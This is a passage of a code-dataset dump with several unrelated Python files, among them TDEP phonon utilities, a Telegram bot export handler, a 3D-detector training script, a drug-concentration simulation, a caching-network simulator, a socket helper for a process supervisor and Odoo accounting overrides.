print('密码错误,你的账户已被锁定')\n\n\nyodels()\n","repo_name":"murongqianxi/Python","sub_path":"code/Applets/User login.py","file_name":"User login.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"8892862128","text":"from utils.material import material\nfrom utils.job_manage import managing_job\nfrom utils.read_abo import abo_done\nfrom utils.utilities import *\nimport os\nfrom os.path import join\nimport glob\nimport subprocess as sp\nfrom collections import defaultdict\nimport time\nimport re\nfrom datetime import datetime\nimport numpy as np\nfrom periodictable import elements\n\n\n\ndef tdep_cell(mpid, idx, dims, temp, max_freq, jobdir):\n jdir = join(jobdir,str(mpid))\n content, check_dict, lattice, frac, cart, znucls, typats = read_uc_abinit(jdir)\n write_uc_vasp(lattice, cart, znucls, typats, jdir)\n original_dir = os.getcwd()\n print(\"directory before tdep:\", os.getcwd())\n os.chdir(jdir)\n print(\"directory for tdep:\", os.getcwd())\n if isinstance(dims, list):\n nx,ny,nz = dims\n os.system(f'generate_structure --dimensions {nx} {ny} {nz}')\n elif isinstance(dims, int):\n os.system(f'generate_structure -na {dims}')\n os.system(f'cp outfile.ssposcar infile.ssposcar')\n os.system(f'canonical_configuration --quantum --maximum_frequency {max_freq} --temperature {temp} -n 1 --output_format 2')\n os.system(f'cp abinput_conf0001 supercell-{idx:0{5}d}.in')\n os.chdir(original_dir)\n combine_header_abinput(mpid, idx, jobdir) #!\n print(\"directory after tdep:\", os.getcwd())\n\n\ndef tdep_next_cell(mpid, dims, temp, max_freq, jobdir, stdep=False):\n jdir = join(jobdir,str(mpid))\n idx = count_files(jdir, 'supercell-') + 1\n if stdep:\n pass\n # TODO: sTDEP\n else:\n tdep_cell(mpid, idx, dims, temp, max_freq, jobdir)\n\n\ndef tdep_complete_cells(mpid, n_td, dims, temp, max_freq, jobdir, stdep=False):\n for i in range(n_td):\n tdep_next_cell(mpid, dims, temp, max_freq, jobdir, stdep)\n\n\ndef tdep_cells_all(mpids, r_ss, dims, temp, max_freq, jobdir, stdep=False):\n for mpid in mpids:\n jdir = join(jobdir,str(mpid))\n original_dir = os.getcwd()\n print(\"home dir:\", os.getcwd())\n os.chdir(jdir)\n print(\"jdir:\", os.getcwd())\n os.system(f'rm ./supercell-*.in')\n os.chdir(original_dir)\n print(\"home dir:\", os.getcwd())\n n_p3 = count_files(join(jobdir, str(mpid), 'phono3py'), 'supercell-')\n n_td = int(n_p3 * r_ss)\n tdep_complete_cells(mpid, n_td, dims, temp, max_freq, jobdir, stdep)\n\ndef combine_header_abinput(mpid, idx, jobdir):\n # Define the filenames\n jdir = join(jobdir,str(mpid))\n header_filename = join(jdir, 'header.in') \n supercell_filename = join(jdir, f'supercell-{idx:0{5}d}.in') \n output_filename = join(jdir, f'disp-{idx:0{5}d}.in') \n\n # Read the contents of the header file\n with open(header_filename, 'r') as header_file:\n header_contents = header_file.readlines()\n\n # Read the contents of the supercell file and filter out lines starting with 'mode'\n with open(supercell_filename, 'r') as supercell_file:\n supercell_contents = [line for line in supercell_file if not 'mode' in line]\n\n # Combine the contents\n combined_contents = header_contents + supercell_contents\n\n # Write the combined contents to the output file\n with open(output_filename, 'w') as output_file:\n output_file.writelines(combined_contents)\n\n print(f\"Combined file saved as {output_filename}.\")\n\n\ndef read_uc_abinit(jdir):\n with open(join(jdir, \"pc.in\"), \"r\") as f:\n content = f.readlines()\n content = [c[:-1] if c.endswith('\\n') else c for c in content]\n print(content)\n checklist = ['xred', 'rprim', 'typat', 'znucl']\n check_dict = {}\n for c in checklist:\n for i, line in enumerate(content):\n if c in line:\n check_dict[c]=i\n print(check_dict)\n lattice = np.array([[float(item) for item in content[check_dict['rprim']+i+1].split()] for i in range(3)])\n # print('lattice: ', lattice)\n frac = np.array([[float(item) for item in content[check_dict['xred']+i+1].split()] for i in range(check_dict['rprim']-check_dict['xred']-1)])\n # print('frac: ', frac)\n cart = frac@lattice\n # print('cart: ', cart)\n znucls = [elements[int(item)].symbol for item in content[check_dict['znucl']+1].split()]\n # print('znucls: ', znucls)\n typats = [int(item)-1 for item in content[check_dict['typat']+1].split()]\n # print('typats: ', typats)\n return content, check_dict, lattice, frac, cart, znucls, typats\n\ndef write_uc_vasp(lattice, cart, znucls, typats, jdir):\n lines = [\" \".join(znucls), '1.000']\n for row in lattice:\n row_str = ' ' + \"\\t\".join(map(str, row))\n lines.append(row_str)\n lines.append(' ' + \" \".join([znucls[i] for i in typats]))\n lines.append(' ' + \" \".join(['1' for i in typats]))\n lines.append('Cartesian')\n for row in cart:\n row_str = ' ' + \"\\t\".join(map(str, row))\n lines.append(row_str)\n \n with open(join(jdir, \"infile.ucposcar\"), \"w\") as f:\n for line in lines:\n f.write(line + \"\\n\")\n\n\ndef get_infile_positions(mpid, idx, jobdir):\n jdir = join(jobdir,str(mpid))\n input_filename = join(jdir, f'disp-{idx:0{5}d}.in')\n output_filename = join(jdir, 'infile.positions')\n with open(input_filename, 'r') as input_file:\n lines = input_file.readlines()\n output_lines = []\n found_xred = False\n for line in lines:\n if 'xred' in line:\n found_xred = True\n continue\n if 'vel' in line:\n break\n if found_xred and line.strip() and not line.startswith('#'):\n output_lines.append(line.split('#')[0].strip())\n with open(output_filename, 'w') as output_file:\n output_file.write('\\n'.join(output_lines))\n \ndef get_infile_forces(mpid, idx, jobdir):\n jdir = join(jobdir,str(mpid))\n input_filename = join(jdir, f'disp-{idx:0{5}d}.abo')\n output_filename = join(jdir, 'infile.forces')\n with open(input_filename, 'r') as input_file:\n lines = input_file.readlines()\n\n output_lines = []\n found_cartesian_forces = False\n\n check_dict={}\n for i, line in enumerate(lines):\n if 'cartesian_forces' in line:\n check_dict['start']=i+1\n if 'force_length_stats' in line:\n check_dict['end']=i\n\n print(check_dict)\n for i in range(check_dict['start'], check_dict['end']):\n print(i)\n line = lines[i]\n cleaned_line = line[1:].replace('[', '').replace(']', '').replace(',', '').strip()\n output_lines.append(cleaned_line)\n with open(output_filename, 'w') as output_file:\n output_file.write('\\n'.join(output_lines))\n\n\ndef get_infile_meta(mpid, temp, jobdir):\n jdir = join(jobdir,str(mpid))\n input_filename = join(jdir, 'infile.ssposcar')\n output_filename = join(jdir, 'infile.meta')\n num_atoms = 0\n with open(input_filename, 'r') as input_file:\n lines = input_file.readlines()\n lines = [c[:-1] if c.endswith('\\n') else c for c in lines]\n\n for line in lines:\n if line.strip().endswith('coordinates'):\n num_atoms = sum([int(v) for v in lines[lines.index(line) - 1].split()])\n break\n with open(output_filename, 'w') as output_file:\n output_file.write(f\"{num_atoms}\\t# N atoms\\n\")\n output_file.write(f\"0\\t# N timesteps\\n\")\n output_file.write(f\"1.0\\t# timestep in fs\\n\")\n output_file.write(f\"{temp}\\t# temperature in K\\n\")\n\n\ndef get_infile_stat(mpid, jobdir):\n jdir = join(jobdir,str(mpid))\n output_filename = join(jdir, 'infile.stat')\n with open(output_filename, 'w') as output_file:\n output_file.write(\"0 1 1 1 1 1 1 1 1 1 1 1 1\\n\")\n","repo_name":"RyotaroOKabe/ab_anharmonic","sub_path":"utils/tdep.py","file_name":"tdep.py","file_ext":"py","file_size_in_byte":7571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"36518183042","text":"from odoo import api, models\n\n\nclass MailComposeMessage(models.TransientModel):\n _inherit = 'mail.compose.message'\n\n \n def send_mail(self, auto_commit=False):\n if self._context.get('default_model') == 'account.tax.withholding' and self._context.get(\n 'default_res_id') and self._context.get('mark_so_as_sent'):\n withhold = self.env['account.tax.withholding'].browse([self._context['default_res_id']])\n if withhold.state == 'send':\n withhold.state = 'sent'\n self = self.with_context(mail_post_autofollow=True)\n return super(MailComposeMessage, self).send_mail(auto_commit=auto_commit)\n","repo_name":"DosSantosAlberto/V16","sub_path":"l10n_ao/wizards/mail_compose_message.py","file_name":"mail_compose_message.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"23266882510","text":"from .dispetcher import dp\nfrom pandas import DataFrame\nfrom aiogram import types\nfrom datetime import datetime\nimport os\nfrom aiogram_calendar import simple_cal_callback, SimpleCalendar\n\n\nfrom func import delete_message, return_month, \\\n write_styling_excel, month_name, create_xml\nfrom clas import User, ToxicCase, Organization, Log\n\n\n@dp.message_handler(commands=['file_get_toxic_cases'])\nasync def file_get_toxic_cases(message: types.Message):\n await delete_message(message)\n\n try:\n await User.get(message['from']['id'])\n except ValueError:\n await Log.add(message['from']['id'], 2)\n return await message.answer(\n \"вы неизвестный пользователь!\",\n parse_mode='html'\n )\n await message.answer(\n text=\"Выбор даты:\",\n reply_markup=await SimpleCalendar().start_calendar(\n datetime.now().year,\n datetime.now().month\n )\n )\n\n\n@dp.callback_query_handler(simple_cal_callback.filter())\nasync def process_simple_calendar(\n callback_query: types.CallbackQuery,\n callback_data: dict):\n \"\"\"Создание задания после выбора даты из календаря\"\"\"\n\n selected, date = await SimpleCalendar().process_selection(\n callback_query,\n callback_data)\n\n if selected:\n await delete_message(callback_query.message)\n\n USER = await User.get(callback_query['from']['id'])\n if USER.role in ['admin', 'rpn']:\n MO = await Organization.get_org_id_list()\n else:\n MO = [USER.org]\n START, END = return_month(date)\n\n JSON = await ToxicCase.file_cases_mo(START, END, MO)\n\n df = DataFrame(data=JSON)\n df = df.fillna('')\n if len(df) == 0:\n mess = f'Нет случаев за месяц {month_name(date.month)}' \\\n + f' {date.year} года'\n return await callback_query.message.answer(mess)\n FILENAME = f'/tmp/Случаи_за_{month_name(date.month)}_{date.year}.xlsx'\n SHETNAME = 'def'\n if USER.role in ['rpn']:\n df = df.loc[(df['Статус СМО'] == 'актуальный') & (df['Этап установления диагноза'] == 'Заключительный')]\n del df['Этап установления диагноза']\n del df['Статус СМО']\n\n write_styling_excel(FILENAME, df, SHETNAME)\n await callback_query.message.answer_document(open(FILENAME, 'rb'))\n os.remove(FILENAME)\n await Log.add(USER.u_id, 21)\n\n # Создаем файлик XML\n if USER.role in ['admin', 'rpn']:\n # за месяц\n JSON = await ToxicCase.file_cases_xml(START, END)\n NAME = f'Случаи_за_{month_name(date.month)}_{date.year}'\n FILE = create_xml(JSON, NAME)\n await callback_query.message.answer_document(open(FILE, 'rb'))\n\n # за день\n JSON = await ToxicCase.file_cases_xml(date, date)\n NAME = f'Случаи_за_{date.strftime(\"%d_%m_%Y\")}'\n FILE = create_xml(JSON, NAME)\n await callback_query.message.answer_document(open(FILE, 'rb'))\n","repo_name":"oleg-medovikov/bot-regiza","sub_path":"disp/file_cases_mo.py","file_name":"file_cases_mo.py","file_ext":"py","file_size_in_byte":3286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"27173120282","text":"from __future__ import division\nimport argparse\nimport sys\nsys.path.append('/home/billyhe/SA-SSD')\nfrom mmcv.parallel import MMDataParallel, MMDistributedDataParallel\nfrom mmdet.datasets import build_dataloader\nfrom tools.env import get_root_logger, init_dist, set_random_seed\nfrom tools.train_utils import train_model\nimport pathlib\nfrom mmcv import Config\nfrom mmdet.datasets import get_dataset\nfrom mmdet.models import build_detector\nfrom tools.train_utils.optimization import build_optimizer, build_scheduler\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Train a detector')\n parser.add_argument('config', help='train config file path')\n parser.add_argument('--work_dir', help='the dir to save logs and models')\n parser.add_argument(\n '--validate',\n action='store_true',\n help='whether to evaluate the checkpoint during training')\n parser.add_argument(\n '--gpus',\n type=int,\n default=1,\n help='number of gpus to use '\n '(only applicable to non-distributed training)')\n parser.add_argument('--seed', type=int, default=0, help='random seed')\n parser.add_argument(\n '--launcher',\n choices=['none', 'pytorch', 'slurm', 'mpi'],\n default='none',\n help='job launcher')\n parser.add_argument('--local_rank', type=int, default=0)\n parser.add_argument('--max_ckpt_save_num', type=int, default=10)\n\n args = parser.parse_args()\n\n return args\n\n\n\ndef main():\n\n args = parse_args()\n\n cfg = Config.fromfile(args.config)\n\n if args.work_dir is not None:\n cfg.work_dir = args.work_dir\n\n pathlib.Path(cfg.work_dir).mkdir(parents=True, exist_ok=True)\n\n cfg.gpus = args.gpus\n\n # init distributed env first, since logger depends on the dist info.\n if args.launcher == 'none':\n distributed = False\n else:\n distributed = True\n init_dist(args.launcher, **cfg.dist_params)\n\n # init logger before other steps\n logger = get_root_logger(cfg.work_dir)\n\n logger.info('Distributed training: {}'.format(distributed))\n\n # set random seeds\n if args.seed is not None:\n logger.info('Set random seed to {}'.format(args.seed))\n set_random_seed(args.seed)\n\n model = build_detector(\n cfg.model, train_cfg=cfg.train_cfg, test_cfg=cfg.test_cfg)\n\n if distributed:\n model = MMDistributedDataParallel(model.cuda())\n else:\n model = MMDataParallel(model, device_ids=range(cfg.gpus)).cuda()\n\n train_dataset = get_dataset(cfg.data.train)\n\n optimizer = build_optimizer(model, cfg.optimizer)\n\n train_loader = build_dataloader(\n train_dataset,\n cfg.data.imgs_per_gpu,\n cfg.data.workers_per_gpu,\n dist=distributed)\n\n start_epoch = it = 0\n last_epoch = -1\n\n lr_scheduler, lr_warmup_scheduler = build_scheduler(\n optimizer, total_iters_each_epoch=len(train_loader), total_epochs=cfg.total_epochs,\n last_epoch=last_epoch, optim_cfg=cfg.optimizer, lr_cfg=cfg.lr_config\n )\n # -----------------------start training---------------------------\n logger.info('**********************Start training**********************')\n\n train_model(\n model,\n optimizer,\n train_loader,\n lr_scheduler=lr_scheduler,\n optim_cfg=cfg.optimizer,\n start_epoch=start_epoch,\n total_epochs=cfg.total_epochs,\n start_iter=it,\n rank=args.local_rank,\n logger = logger,\n ckpt_save_dir=cfg.work_dir,\n lr_warmup_scheduler=lr_warmup_scheduler,\n ckpt_save_interval=cfg.checkpoint_config.interval,\n max_ckpt_save_num=args.max_ckpt_save_num,\n log_interval = cfg.log_config.interval\n )\n\n logger.info('**********************End training**********************')\n\n\n\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"skyhehe123/SA-SSD","sub_path":"tools/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3839,"program_lang":"python","lang":"en","doc_type":"code","stars":486,"dataset":"github-code","pt":"76"} +{"seq_id":"38247750893","text":"\n# Drugs version 1: exponential decay\n# Stephen Davies -- CPSC 420\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\n\nsimulation_hrs = 24 # hours\ndelta_t = 5/60 # hours\ntime_values = np.arange(0, simulation_hrs, delta_t) # hours\ndosage_freq = 2 # hours\ndosage = 2 * 325 * 1000 # ug\n\nhalf_life = 3.2 # hours\nplasma_volume = 3000 # ml\nelimination_constant = math.log(2)/half_life # 1/hour\n\n# Create an (empty) array for the stock.\nD = np.zeros(len(time_values)) # ug\n\n# Initial conditions: pop two aspirin at the start of the simulation.\nD[0] = dosage # ug\n\n\nfor i in range(1, len(time_values)):\n\n # Compute the values for the flows.\n elimination_rate = elimination_constant * D[i-1] # ug/hr\n\n # Add up all the values for the \"primes.\"\n D_prime = -elimination_rate \n\n # Calculate the next value of the stocks, based on the primes.\n D[i] = D[i-1] + D_prime * delta_t\n\n # If it's time to pop another pill, do so, by just adding to the stock.\n if i in np.arange(0,len(time_values),int(dosage_freq/delta_t)):\n D[i] += dosage\n \n\n# Compute the value for the derived stock.\nplasma_concentration = D / plasma_volume\n\n# MEC: Minimum Effective Concentration (has to be this high to do any good)\nmec = 150 # ug/ml\n\n# MTC: Maximum Therapeutic Concentration (don't exceed!)\nmtc = 350 # ug/ml\n\nplt.plot(time_values, plasma_concentration)\nplt.axhline(mec, color=\"blue\")\nplt.axhline(mtc, color=\"red\")\nplt.ylim(0,max(plasma_concentration.max(), 400))\n\nplt.show()\n","repo_name":"divilian/cpsc420","sub_path":"drugs1.py","file_name":"drugs1.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"27364368588","text":"\"\"\"This module implements the simulation engine.\n\nThe simulation engine, given the parameters according to which a single\nexperiments needs to be run, instantiates all the required classes and executes\nthe experiment by iterating through the event provided by an event generator\nand providing them to a strategy instance.\n\"\"\"\nfrom icarus.execution import NetworkModel, NetworkView, NetworkController, CollectorProxy\nfrom icarus.registry import DATA_COLLECTOR, STRATEGY\n\nimport networkx as nx\nimport fnss\n\n\n__all__ = ['exec_experiment',\n\t\t 'exec_offline_experiment',\n\t\t ]\n\ndef symmetrify_paths(shortest_paths):\n\t\"\"\"Make paths symmetric\n\n\tGiven a dictionary of all-pair shortest paths, it edits shortest paths to\n\tensure that all path are symmetric, e.g., path(u,v) = path(v,u)\n\n\tParameters\n\t----------\n\tshortest_paths : dict of dict\n\t\tAll pairs shortest paths\n\n\tReturns\n\t-------\n\tshortest_paths : dict of dict\n\t\tAll pairs shortest paths, with all paths symmetric\n\n\tNotes\n\t-----\n\tThis function modifies the shortest paths dictionary provided\n\t\"\"\"\n\tfor u in shortest_paths:\n\t\tfor v in shortest_paths[u]:\n\t\t\tshortest_paths[u][v] = list(reversed(shortest_paths[v][u]))\n\treturn shortest_paths\n\ndef exec_experiment(topology, workload, netconf, strategy, cache_policy, collectors):\n\t\"\"\"Execute the simulation of a specific scenario.\n\n\tParameters\n\t----------\n\ttopology : Topology\n\t\tThe FNSS Topology object modelling the network topology on which\n\t\texperiments are run.\n\tworkload : iterable\n\t\tAn iterable object whose elements are (time, event) tuples, where time\n\t\tis a float type indicating the timestamp of the event to be executed\n\t\tand event is a dictionary storing all the attributes of the event to\n\t\texecute\n\tnetconf : dict\n\t\tDictionary of attributes to inizialize the network model\n\tstrategy : tree\n\t\tStrategy definition. It is tree describing the name of the strategy\n\t\tto use and a list of initialization attributes\n\tcache_policy : tree\n\t\tCache policy definition. It is tree describing the name of the cache\n\t\tpolicy to use and a list of initialization attributes\n\tcollectors: dict\n\t\tThe collectors to be used. It is a dictionary in which keys are the\n\t\tnames of collectors to use and values are dictionaries of attributes\n\t\tfor the collector they refer to.\n\n\tReturns\n\t-------\n\tresults : Tree\n\t\tA tree with the aggregated simulation results from all collectors\n\t\"\"\"\n\tmodel = NetworkModel(topology, cache_policy, **netconf)\n\tview = NetworkView(model)\n\tcontroller = NetworkController(model)\n\n\tcollectors_inst = [DATA_COLLECTOR[name](view, **params)\n\t\t\t\t\t for name, params in collectors.items()]\n\tcollector = CollectorProxy(view, collectors_inst)\n\tcontroller.attach_collector(collector)\n\n\tstrategy_name = strategy['name']\n\tstrategy_args = {k: v for k, v in strategy.items() if k != 'name'}\n\tstrategy_inst = STRATEGY[strategy_name](view, controller, **strategy_args)\n\n\tfor time, event in workload:\n\t\tstrategy_inst.process_event(time, **event)\n\treturn collector.results()\n\ndef exec_offline_experiment(topology, workload, netconf, strategy, ):\n\t# Filter inputs\n\tif not isinstance(topology, fnss.Topology):\n\t\traise ValueError('The topology argument must be an instance of '\n\t\t\t\t\t\t 'fnss.Topology or any of its subclasses.')\n\n\t# Shortest paths of the network\n\tshortest_path = symmetrify_paths(nx.all_pairs_dijkstra_path(topology))\n\tcontent_source = {}\n\t# Dictionary mapping the reverse, i.e. nodes to set of contents stored\n\tsource_node = {}\n\n\t# Dictionary of link weights\n\tlink_weight = nx.get_edge_attributes(topology, 'util')\n\tif not topology.is_directed():\n\t\tfor (u, v), lw in list(link_weight.items()):\n\t\t\tlink_weight[(v, u)] = lw\n\n\tcache_size = {}\n\tfor node in topology.nodes_iter():\n\t\tstack_name, stack_props = fnss.get_stack(topology, node)\n\t\tif stack_name == 'router':\n\t\t\tif 'cache_size' in stack_props:\n\t\t\t\tcache_size[node] = stack_props['cache_size']\n\t\telif stack_name == 'source':\n\t\t\tcontents = stack_props['contents']\n\t\t\tsource_node[node] = contents\n\t\t\tfor content in contents:\n\t\t\t\tcontent_source[content] = node\n\tif any(c < 1 for c in cache_size.values()):\n\t\tfor node in cache_size:\n\t\t\tif cache_size[node] < 1:\n\t\t\t\tcache_size[node] = 1\n\n\tpopularity = workload.get_popularity_all()\n\n\tstrategy_name = strategy['name']\n\tstrategy_inst = STRATEGY[strategy_name](shortest_path, link_weight, cache_size, workload.contents, content_source, popularity)\n\treturn strategy_inst.results()","repo_name":"milliele/WeightedCache","sub_path":"icarus/execution/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":4389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"37305976444","text":"from .choice import Input\n\n__all__ = (\"YesNo\", \"yesno\")\n\nclass YesNo(Input):\n r\"\"\"\n A :class:`~senko.utils.io.Input` for boolean values.\n\n Prompts the user to choose yes or no, and returns the\n appropriate boolean value.\n\n Parameters\n ----------\n ctx: Union[senko.CommandContext, senko.PartialContext]\n The context under which to run the prompt.\n timeout: Optional[float]\n Delay in seconds after which the prompt should time out. Defaults to 60.\n raise_timeout: Optional[bool]\n Whether to raise when timing out. Defaults to ``False``.\n delete_after: Optional[bool]\n Whether to delete the prompt and user input upon completing.\n Defaults to ``False``.\n \\*\\*kwargs\n Keyword arguments to pass into :func:`senko.utils.io.build_embed` to\n build the input prompt embed from.\n \"\"\"\n\n def __init__(\n self,\n ctx,\n timeout=60,\n raise_timeout=False,\n delete_after=False,\n **kwargs,\n ):\n # Initialize superclass\n super().__init__(\n ctx,\n converter=bool,\n ignore_errors=True,\n timeout=timeout,\n raise_timeout=raise_timeout,\n raise_errors=False,\n delete_after=delete_after,\n **kwargs,\n )\n\n async def _send_message(self):\n # Generate field for yes and no options.\n _ = self.ctx.locale\n\n # NOTE: Name of the \"Options\" field in yes/no prompts.\n field_name = _(\"Options\")\n\n # NOTE: Text for the \"yes\" option in a yes/no prompt.\n yes_text = _(\"{e:check} Respond with **yes** to confirm.\")\n\n # NOTE: Text for the \"no\" option in a yes/no prompt.\n no_text = _(\"{e:cross} Respond with **no** to cancel.\")\n\n field_value = self.bot.emotes.format(f\"{yes_text}\\n{no_text}\")\n\n kwargs = self.kwargs.copy()\n fields = self.kwargs.get(\"fields\", []).copy()\n fields.append(dict(name=field_name, value=field_value, inline=False))\n kwargs[\"fields\"] = fields\n\n return await self.ctx.embed(**kwargs)\n\nasync def yesno(ctx, **kwargs):\n r\"\"\"\n Create and run a :class:`~senko.utils.io.YesNo` and return its result.\n\n Parameters\n ----------\n ctx: Union[senko.CommandContext, senko.PartialContext]\n The context under which to run the prompt.\n \\*args\n Positional arguments to pass into :class:`~senko.utils.io.YesNo`.\n \\*\\*kwargs\n Keyword arguments to pass into :class:`~senko.utils.io.YesNo`.\n\n Raises\n ------\n InputTimeoutError\n Exception raised when the prompt times out.\n \n Returns\n -------\n Optional[bool]\n Either a boolean value denoting the user's choice, \n or ``None`` if the prompt timed out.\n \"\"\"\n prompt = YesNo(ctx, **kwargs)\n return await prompt.run()\n","repo_name":"rawsumi/senko-disc-bot","sub_path":"utils/io/yesno.py","file_name":"yesno.py","file_ext":"py","file_size_in_byte":2855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"36944747105","text":"#!/usr/bin/python3\n\nimport os\nimport configparser\nimport re\nimport time\nimport signal\nimport socket\nimport struct\nimport sys\nimport errno\n\nEND = 'DAEMON COPY'\n\nSOCKFILE = '/tmp/taskmaster.sock'\n\nLOGFILE = 'tmp/taskmaster.log'\n\n\nclass ServerSocket():\n def __init__(self):\n self.sock_address = SOCKFILE\n try:\n os.remove(self.sock_address)\n except OSError:\n pass\n self.socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n self.connection = None\n self.address = None\n self.socket.bind(self.sock_address)\n self.socket.listen(1)\n self.accept()\n def accept(self):\n try:\n self.connection, self.address = self.socket.accept()\n except socket.error as err:\n if err.errno == errno.EINTR:\n self.accept()\n def send(self, msg):\n try:\n length = struct.pack('!I', len(msg))\n self.connection.sendall(length)\n self.connection.sendall(msg.encode())\n except socket.error as err:\n if err.errno == errno.EBADF:\n self.accept()\n if err.errno == errno.EINTR:\n self.send(msg)\n def recv(self):\n try:\n n = self.connection.recv(4)\n if not n: return None\n length, = struct.unpack('!I', n)\n message = self.connection.recv(length)\n return message.decode()\n except socket.error as err:\n if err.errno == errno.EBADF:\n self.accept()\n if err.errno == errno.EINTR:\n pass\n def close_connection(self):\n if self.connection:\n self.connection.close()\n def close_socket(self):\n if self.socket:\n self.socket.close()\n\nclass ClientSocket():\n def __init__(self):\n self.sock_address = SOCKFILE\n self.connect()\n def connect(self):\n try:\n self.socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n self.socket.connect(self.sock_address)\n except socket.error as err:\n if err.errno == errno.ECONNREFUSED:\n print('No Daemon , Try Starting It !')\n sys.exit()\n def send(self, msg):\n try:\n length = struct.pack('!I', len(msg))\n self.socket.sendall(length)\n self.socket.sendall(msg.encode())\n except (OSError, socket.error) as err:\n if err.errno == errno.EPIPE or err.errno == errno.ENOTCONN:\n print('No Daemon , Try Starting It !')\n sys.exit()\n def recv(self):\n try:\n n = self.socket.recv(4)\n if not n: return None\n length, = struct.unpack('!I', n)\n message = self.socket.recv(length)\n return message.decode()\n except (OSError, socket.error) as err:\n if err.errno == errno.EPIPE or err.errno == errno.ENOTCONN:\n print('No Daemon , Try Starting It !')\n sys.exit()\n def close(self):\n self.socket.close()\n","repo_name":"MohsineF/master","sub_path":"tasksocket.py","file_name":"tasksocket.py","file_ext":"py","file_size_in_byte":3082,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"32141012422","text":"import logging\n\nfrom odoo import api, models\n\n_logger = logging.getLogger(__name__)\n\n\nclass AccountMove(models.Model):\n _name = \"account.move\"\n _inherit = [\"account.move\", \"l10n.ro.mixin\"]\n\n def button_create_landed_costs(self):\n \"\"\"Update account of the landed cost ine with the one from invoice line.\"\"\"\n\n res = super().button_create_landed_costs()\n landed_cost = self.env[\"stock.landed.cost\"].browse(res.get(\"res_id\"))\n if self.is_l10n_ro_record and landed_cost:\n picking_invoice_ids = (\n self.line_ids.mapped(\"purchase_line_id\")\n .mapped(\"order_id\")\n .mapped(\"picking_ids\")\n )\n picking_landed_cost_ids = (\n self.env[\"stock.landed.cost\"]\n .search([(\"state\", \"=\", \"done\")])\n .mapped(\"picking_ids\")\n )\n landed_cost.picking_ids = picking_invoice_ids.filtered(\n lambda l: l not in picking_landed_cost_ids and l.state == \"done\"\n )\n for line in landed_cost.cost_lines:\n invoice_line = self.line_ids.filtered(\n lambda l: l.product_id == line.product_id\n )\n if invoice_line:\n line.account_id = invoice_line[0].account_id\n return res\n\n def _stock_account_prepare_anglo_saxon_out_lines_vals(self):\n # nu se mai face descarcarea de gestiune la facturare\n invoices = self\n for move in self:\n if move.is_l10n_ro_record:\n invoices -= move\n return super(\n AccountMove, invoices\n )._stock_account_prepare_anglo_saxon_out_lines_vals()\n\n def action_post(self):\n res = super(AccountMove, self).action_post()\n for move in self.filtered(\"is_l10n_ro_record\"):\n for line in move.line_ids:\n _logger.debug(\n \"%s\\t\\t%s\\t\\t%s\"\n % (line.debit, line.credit, line.account_id.display_name)\n )\n invoice_lines = move.invoice_line_ids.filtered(lambda l: not l.display_type)\n for line in invoice_lines:\n valuation_stock_moves = line._l10n_ro_get_valuation_stock_moves()\n if valuation_stock_moves:\n svls = valuation_stock_moves.sudo().mapped(\n \"stock_valuation_layer_ids\"\n )\n svls = svls.filtered(lambda l: not l.l10n_ro_invoice_line_id)\n svls.write(\n {\n \"l10n_ro_invoice_line_id\": line.id,\n \"l10n_ro_invoice_id\": line.move_id.id,\n }\n )\n\n return res\n\n\nclass AccountMoveLine(models.Model):\n _name = \"account.move.line\"\n _inherit = [\"account.move.line\", \"l10n.ro.mixin\"]\n\n @api.onchange(\"is_landed_costs_line\")\n def _onchange_is_landed_costs_line(self):\n res = super()._onchange_is_landed_costs_line()\n if (\n self.move_id.is_l10n_ro_record\n and self.product_type == \"service\"\n and self.is_landed_costs_line\n ):\n accounts = self.product_id.product_tmpl_id._get_product_accounts()\n if self.move_id.move_type not in (\"out_invoice\", \"out_refund\"):\n self.account_id = accounts[\"expense\"]\n else:\n self.account_id = accounts[\"income\"]\n return res\n\n def _l10n_ro_get_valuation_stock_moves(self):\n valuation_stock_moves = self.env[\"stock.move\"]\n if self.purchase_line_id or self.sale_line_ids:\n domain = [\n (\"state\", \"=\", \"done\"),\n (\"product_qty\", \"!=\", 0.0),\n ]\n if self.purchase_line_id:\n domain += [(\"purchase_line_id\", \"=\", self.purchase_line_id.id)]\n if self.sale_line_ids:\n domain += [(\"sale_line_id\", \"in\", self.sale_line_ids.ids)]\n\n valuation_stock_moves = self.env[\"stock.move\"].search(domain)\n\n return valuation_stock_moves\n\n def _get_computed_account(self):\n res = super(AccountMoveLine, self)._get_computed_account()\n # Take accounts from stock location in case the category allow changinc\n # accounts and the picking is not notice\n if (\n self.product_id.categ_id.l10n_ro_stock_account_change\n and self.product_id.type == \"product\"\n and self.move_id.is_l10n_ro_record\n ):\n fiscal_position = self.move_id.fiscal_position_id\n if self.move_id.is_purchase_document():\n stock_moves = self._get_account_change_stock_moves_purchase()\n for stock_move in stock_moves:\n if (\n stock_move.location_dest_id.l10n_ro_property_stock_valuation_account_id\n ):\n location = stock_move.location_dest_id\n res = location.l10n_ro_property_stock_valuation_account_id\n if self.move_id.is_sale_document():\n stock_moves = self._get_account_change_stock_moves_sale()\n for stock_move in stock_moves:\n if (\n stock_move.location_id.l10n_ro_property_account_income_location_id\n ):\n location = stock_move.location_id\n res = location.l10n_ro_property_account_income_location_id\n if fiscal_position:\n res = fiscal_position.map_account(res)\n return res\n\n def _get_account_change_stock_moves_purchase(self):\n stock_moves = 